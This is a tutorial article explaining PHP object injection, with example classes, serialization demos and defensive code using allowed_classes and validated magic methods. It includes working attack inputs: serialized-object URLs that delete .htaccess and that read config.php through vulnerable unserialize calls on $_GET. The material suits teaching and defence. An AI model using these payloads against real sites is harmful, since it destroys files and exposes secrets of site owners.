Understanding php Object Injection

Source: Internet
Author: User

0x00 background

PHP object injection is a fairly common vulnerability. Although it is often hard to exploit, it can be very dangerous. To understand it, you need basic PHP knowledge.

0x01 vulnerability Cases

If you think this is a minor issue, take a look at the list below. Some of these systems, in which auditors have found this vulnerability, may be familiar to you:

WordPress 3.6.1

Magento 1.9.0.1

Joomla 3.0.3

Ip board 3.3.5

In addition, many other PHP programs probably contain vulnerabilities of this kind, so sit down with a cup of coffee and work through this article.

0x01 PHP class and Object

Classes and objects are easy to understand. For example, the following code defines a variable and a method in a class.

<?php
class TestClass
{
    // a variable
    public $variable = 'This is a string';

    // a simple method
    public function PrintVariable()
    {
        echo $this->variable;
    }
}

// create an object
$object = new TestClass();
// call a method
$object->PrintVariable();
?>

It creates an object and calls the PrintVariable method, which outputs the variable.

0x02 php magic Method

A PHP class may contain special functions such as __construct, __destruct, __toString, __sleep and __wakeup. These are called magic methods.

These functions are called automatically in certain situations, for example:

__construct is called when an object is created (constructor)
__destruct is called when an object is destroyed (destructor)
__toString is called when an object is used as a string

To better understand how magic methods work, let's add some magic methods to our class.

<?php
class TestClass
{
    // a variable
    public $variable = 'This is a string';

    // a simple method
    public function PrintVariable()
    {
        echo $this->variable . '<br/>';
    }

    // constructor
    public function __construct()
    {
        echo '__construct<br/>';
    }

    // destructor
    public function __destruct()
    {
        echo '__destruct<br/>';
    }

    // called when the object is used as a string
    public function __toString()
    {
        return '__toString<br/>';
    }
}

// create an object; __construct is called
$object = new TestClass();
// call a method; 'This is a string' is output
$object->PrintVariable();
// the object is treated as a string; __toString is called
echo $object;
// the PHP script is about to end; __destruct is called
?>

We added three magic methods: __construct, __destruct and __toString. You can see that __construct is called when the object is created, __destruct is called when the PHP script ends, and __toString is called when the object is used as a string.

This script outputs the following:

__construct
This is a string
__toString
__destruct

0x03 php Object serialization

PHP allows you to save an object for later reuse. This process is called serialization. For example, you can save an object that contains user information and reuse it later.

To serialize an object, you call the "serialize" function, which returns a string. When you need the object again, you use "unserialize" to recreate it from that string.

Let's look at a serialization example to see what a serialized object looks like.

<?php
// class
class User
{
    // class data
    public $age = 0;
    public $name = '';

    // output data
    public function PrintData()
    {
        echo 'User ' . $this->name . ' is ' . $this->age . ' years old.<br/>';
    }
}

// create an object
$usr = new User();
// set data
$usr->age = 20;
$usr->name = 'John';
// output data
$usr->PrintData();
// output serialized data
echo serialize($usr);
?>

It outputs

User John is 20 years old.
O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}

You can see that the serialized data contains 20 and John. Apart from the class name, nothing about the class itself (its methods) is included; only the data is serialized.

To use this object again, we call unserialize to recreate it.

<?php
// class
class User
{
    // class data
    public $age = 0;
    public $name = '';

    // print data
    public function PrintData()
    {
        echo 'User ' . $this->name . ' is ' . $this->age . ' years old.<br/>';
    }
}

// recreate the object
$usr = unserialize('O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}');
// call PrintData to output the data
$usr->PrintData();
?>

This will output

User John is 20 years old.

0x04 serialize the magic Function

The constructor (__construct) and destructor (__destruct) are called automatically when an object is created or destroyed; other magic functions are called during serialize or unserialize.

The __sleep magic method is called when an object is serialized. The __wakeup magic method is called when an object is deserialized.

Note that __sleep must return an array with the names of the variables to be serialized.

<?php
class Test
{
    public $variable = 'BUZZ';
    public $variable2 = 'OTHER';

    public function PrintVariable()
    {
        echo $this->variable . '<br/>';
    }

    public function __construct()
    {
        echo '__construct<br/>';
    }

    public function __destruct()
    {
        echo '__destruct<br/>';
    }

    public function __wakeup()
    {
        echo '__wakeup<br/>';
    }

    public function __sleep()
    {
        echo '__sleep<br/>';
        return array('variable', 'variable2');
    }
}

// create an object; __construct is called
$obj = new Test();
// serialize the object; __sleep is called
$serialized = serialize($obj);
// output the serialized string
print 'Serialized: ' . $serialized . '<br/>';
// rebuild the object; __wakeup is called
$obj2 = unserialize($serialized);
// call PrintVariable; the data (BUZZ) is output
$obj2->PrintVariable();
// when the PHP script ends, __destruct is called for both objects
?>

The output will be:

__construct
__sleep
Serialized: O:4:"Test":2:{s:8:"variable";s:4:"BUZZ";s:9:"variable2";s:5:"OTHER";}
__wakeup
BUZZ
__destruct
__destruct

You can see that we created an object, serialized it (__sleep was called), and then created a second object by unserializing the string (__wakeup was called). When the PHP script ends, __destruct is called for both objects.

0x05 php Object Injection

Now that we understand how serialization works, how can it be abused? There are many possibilities, depending on the application's logic, the available classes and their magic functions.

Remember that the values inside a serialized object are controllable.

You may have the source code of a web application and find that the __wakeup, __destruct or other magic functions of some class do something that affects the application.

For example, we may find a class used to temporarily store logs in a file, and when __destruct is called the log file is deleted. The code looks like this:

<?php
class LogFile
{
    // log file name
    public $filename = 'error.log';

    // code that stores logs in the file
    public function LogData($text)
    {
        echo 'Log some data: ' . $text . '<br/>';
        file_put_contents($this->filename, $text, FILE_APPEND);
    }

    // the destructor deletes the log file
    public function __destruct()
    {
        echo '__destruct deletes "' . $this->filename . '" file.<br/>';
        unlink(dirname(__FILE__) . '/' . $this->filename);
    }
}
?>

An example of how this class is used:

<?php
include 'logfile.php';

// create an object
$obj = new LogFile();
// set the file name and store some log data
$obj->filename = 'somefile.log';
$obj->LogData('Test');
// the PHP script ends, __destruct is called and somefile.log is deleted
?>

In another script we may find a call to "unserialize" whose argument is user-controllable, for example something taken straight from $_GET.

<?php
include 'logfile.php';

// ... some code and the LogFile class ...

// simple class definition
class User
{
    // class data
    public $age = 0;
    public $name = '';

    // output data
    public function PrintData()
    {
        echo 'User ' . $this->name . ' is ' . $this->age . ' years old.<br/>';
    }
}

// recreate the object from user input
$usr = unserialize($_GET['usr_serialized']);
?>

As you can see, this script includes the "LogFile" class, and there is an "unserialize" call whose value we can inject.

So we construct a request like this:

script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}

What happens? Because the input is controllable, we can construct any serialized object we like, for example:

<?php
include 'logfile.php';

$obj = new LogFile();
$obj->filename = '.htaccess';
echo serialize($obj) . '<br />';
?>

This will output

O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess";}
__destruct deletes ".htaccess" file.

Now we send the constructed serialized object to the script from before:

script.php?usr_serialized=O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess";}

This will output

__destruct deletes ".htaccess" file.

Now .htaccess has been deleted, because __destruct is called at the end of the script and we control the variables of the "LogFile" class.

This is where the vulnerability gets its name: a serialized object is injected at a point where its variables are controllable and unserialize is performed, which can lead to code execution or other malicious behaviour.

Although this is not a great example, I believe it makes the concept clear: unserialize automatically calls __wakeup and __destruct, so an attacker who controls the class variables can attack the web application.
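As an added example (not code from the original article), here is a defensive helper that reports which classes a serialized string would instantiate, without creating any of them. It relies on the allowed_classes option of unserialize (PHP 7.0+): with allowed_classes set to false, every object in the payload is rebuilt as a __PHP_Incomplete_Class placeholder, whose __wakeup and __destruct do nothing. The sample payloads are the two strings shown in this section; the User-only whitelist and the function names are this example's own assumptions.

```php
<?php
// Added example, not code from the original article.
// Lists the class names inside a serialized payload without instantiating
// them: allowed_classes => false turns every object into a
// __PHP_Incomplete_Class placeholder, so no application __wakeup() or
// __destruct() can run during the inspection.

function collectClassNames($value, array &$classes): void
{
    if ($value instanceof __PHP_Incomplete_Class) {
        // The placeholder keeps the original class name in this property
        // and the object's data in the remaining array entries.
        $props = (array) $value;
        $classes[] = $props['__PHP_Incomplete_Class_Name'];
        unset($props['__PHP_Incomplete_Class_Name']);
        foreach ($props as $prop) {
            collectClassNames($prop, $classes);     // nested objects
        }
    } elseif (is_array($value)) {
        foreach ($value as $item) {
            collectClassNames($item, $classes);
        }
    }
}

function serializedClassNames(string $payload): array
{
    $classes = [];
    // @ silences the notice for malformed input; malformed means "no classes"
    $data = @unserialize($payload, ['allowed_classes' => false]);
    collectClassNames($data, $classes);
    return array_values(array_unique($classes));
}

// Gate to put in front of the page's unserialize($_GET['usr_serialized']):
// true only when every class in the payload is one the script expects.
function payloadIsAcceptable(string $payload, array $expectedClasses): bool
{
    $found = serializedClassNames($payload);
    return array_diff($found, $expectedClasses) === [];
}

// Constructed inputs: the two payloads shown in this section of the article.
$samples = [
    'O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}',
    'O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess";}',
];
foreach ($samples as $payload) {
    $classes = implode(',', serializedClassNames($payload));
    $verdict = payloadIsAcceptable($payload, ['User']) ? 'accept' : 'reject and log';
    echo $verdict, ': ', $classes, PHP_EOL;
}
```

Because the check never builds a real object, it is safe to run on a logging or request-inspection path. A rejected payload is worth recording together with the class names found: an unexpected class name arriving in a request parameter is a strong indicator of an injection attempt against the application.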

0x06 common injection points

Aside from __wakeup and __destruct, there are other common injection points that allow this type of vulnerability to be exploited. Everything depends on the program logic.

For example, a User class may define __toString so that the application can output the object as a string (echo $obj), while another class may define a __toString that reads a file.

<?php
// ... some includes ...

class FileClass
{
    // file name
    public $filename = 'error.log';

    // when the object is used as a string, it reads the file
    public function __toString()
    {
        return file_get_contents($this->filename);
    }
}

// main User class
class User
{
    // class data
    public $age = 0;
    public $name = '';

    // allows the object to be output as a string
    public function __toString()
    {
        return 'User ' . $this->name . ' is ' . $this->age . ' years old.<br/>';
    }
}

// user-controllable input
$obj = unserialize($_GET['usr_serialized']);
// output; __toString is called
echo $obj;
?>

So we construct the URL

script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}

Now think about it: what if we pass a serialized FileClass instead?

We create the exploitation code:

<?php
// FileClass as defined in the script above
$fileobj = new FileClass();
$fileobj->filename = 'config.php';
echo serialize($fileobj);
?>

Then we put the generated string into the URL:

script.php?usr_serialized=O:9:"FileClass":1:{s:8:"filename";s:10:"config.php";}

The page will output the source code of config.php:

<?php $private_data = 'MAGIC'; ?>

PS: I hope this makes the idea clear.
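The LogFile class of 0x05 and the FileClass of this section share the same weakness: a magic method trusts a property that, after unserialize, the sender of the payload chose. As an added example (not code from the original article), here is a hardened counterpart to both. It confines the file name to one directory, re-validates the object's state in __wakeup so that a bad payload aborts unserialize, and keeps the destructive action out of __destruct. The class name, the logs directory and the method names are assumptions made for this example.

```php
<?php
// Added example, not code from the original article: a confined version of
// the page's LogFile / FileClass pattern. Every property may have come from
// unserialize(), so magic methods must validate before touching the file
// system. LOG_DIR is an assumed location for this example.

final class ConfinedLogFile
{
    const LOG_DIR = __DIR__ . '/logs';
    public $filename = 'error.log';

    // Accept plain names such as "error.log" only: no path separators,
    // no dotfiles such as ".htaccess", no files outside LOG_DIR.
    private function resolvedPath(): string
    {
        $name = $this->filename;
        if (!is_string($name) || !preg_match('/^[A-Za-z0-9_-]+\.log$/', $name)) {
            throw new InvalidArgumentException('rejected log file name');
        }
        return self::LOG_DIR . '/' . $name;
    }

    public function logData(string $text): void
    {
        file_put_contents($this->resolvedPath(), $text . PHP_EOL, FILE_APPEND);
    }

    // Same role as the page's FileClass::__toString, but confined to LOG_DIR.
    public function __toString(): string
    {
        $path = $this->resolvedPath();
        return is_file($path) ? (string) file_get_contents($path) : '';
    }

    // Validate the rebuilt state immediately; an exception thrown here
    // propagates out of unserialize(), so no malicious object is returned.
    public function __wakeup(): void
    {
        $this->resolvedPath();
    }

    // Deletion is an explicit call rather than a side effect of the object
    // going out of scope, so a stray unserialize() cannot trigger it.
    public function remove(): bool
    {
        $path = $this->resolvedPath();
        return is_file($path) && unlink($path);
    }

    public function __destruct()
    {
        // intentionally empty: destruction has no file-system side effects
    }
}

// Constructed demonstration (not real request data).
@mkdir(ConfinedLogFile::LOG_DIR);
$log = new ConfinedLogFile();
$log->logData('Test');
echo 'log contents: ', $log;

// The page's ".htaccess" payload, aimed at this class: __wakeup rejects it
// before any object with that filename exists.
$hostile = 'O:15:"ConfinedLogFile":1:{s:8:"filename";s:9:".htaccess";}';
try {
    unserialize($hostile, ['allowed_classes' => ['ConfinedLogFile']]);
} catch (InvalidArgumentException $e) {
    echo 'payload rejected: ', $e->getMessage(), PHP_EOL;
}
$log->remove();
```

Two design points matter here. First, the validation lives in one private method that every file operation and __wakeup call, so a property cannot be used before it has been checked. Second, __destruct does nothing at all: a destructor runs for every object PHP creates, including ones rebuilt by unserialize, which is exactly why the page's LogFile was exploitable.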

0x07 other exploitation methods

Other magic functions may be exploitable as well. For example, __call is called when an object calls a method that does not exist, and __get and __set are called when the object accesses a nonexistent property, and so on.

However, exploitation is not limited to magic functions; ordinary functions can be abused too. For example, a module may define a function called get that performs sensitive operations such as database access, which may lead to SQL injection, depending on what the function itself does.

0x08 how to avoid this vulnerability

Do not pass user-controllable data to "unserialize" wherever you can avoid it; use "json_decode" instead.

0x09 conclusion

Although this vulnerability is difficult to find and exploit, it is serious and can lead to many other vulnerabilities.
